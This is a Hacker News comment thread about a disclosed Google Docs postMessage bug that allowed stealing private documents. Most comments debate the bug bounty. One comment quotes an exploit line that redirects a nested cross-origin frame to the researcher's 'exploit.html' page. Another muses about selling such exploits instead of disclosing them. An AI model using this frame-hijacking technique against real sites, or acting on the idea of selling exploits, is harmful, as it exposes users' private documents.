Stealing private documents through a bug in Google Docs

by hackerpainon 12/28/2020, 1:35:29 PM with 12 comments
  • by jackconsidineon 12/28/2020, 6:28:09 PM

    A few years ago, I built a platform for a client that allowed his customers to show a "Text Me" widget on their websites; the software handled all of the SMS / messaging and basically substituted conventional contact form or Intercom integration.

    His customers used Google AdSense, who started blocking them until they removed the widget. The reason? This widget used an Iframe postMessage, but appropriately specified the singular sandboxed domain. As expected, we never were able to speak with a human at Google- they just sent my clients customers intimidating emails about a security flaw on their websites.

    Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.

  • by xyston 12/28/2020, 2:13:31 PM

    This was a bug that affected multiple products and even crossed into the enterprise suite and google only rewarded $3.3K USD?

    It’s almost as bad as Apple’s reward program

  • by twisson 12/28/2020, 2:13:34 PM

    The most surprising part to me is that this works:

        window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
    It's expected to me that you can change `window.frames[0].location`, since you can also change the "src" attribute of the iframe element. But you can't change the "src" attribute of an iframe inside that iframe, if it's not same-origin - so why can you change its location?

    Maybe we should look into whether changing this would break any websites.

  • by diveanonon 12/28/2020, 2:43:24 PM

    To the people publishing these exploits and collecting the trivial bounties.

    Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

  • by mettamageon 12/28/2020, 3:05:43 PM

    Curious question, if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?

    What I'm trying to ask is: does this make the hiring process easier?

  • by random5634on 12/28/2020, 5:44:03 PM

    Good lord, $3K for this?

    These companies give two craps about security.

  • by paulmendozaon 12/28/2020, 1:55:26 PM

    Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.

  • by konschuberton 12/28/2020, 2:04:43 PM

    Client-side encryption really decreases the attack surfaces of cloud storage solutions.

    It’s really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.

  • by Geeky-caton 12/29/2020, 6:20:04 AM

    Thanks for going through the write-up. As an author of the bug,considering the the impact, user interaction required and other criteria that need to line up to exploit this bug I feel Google VRP's decision on this bug is accurate.

  • by stevespangon 12/28/2020, 5:30:23 PM

    Congrats on Google awarding you Google rewarded $3133.70 for finding this bug

  • by BlackPloton 12/28/2020, 3:40:05 PM

    TBO not surprised at all Gdocs had an issue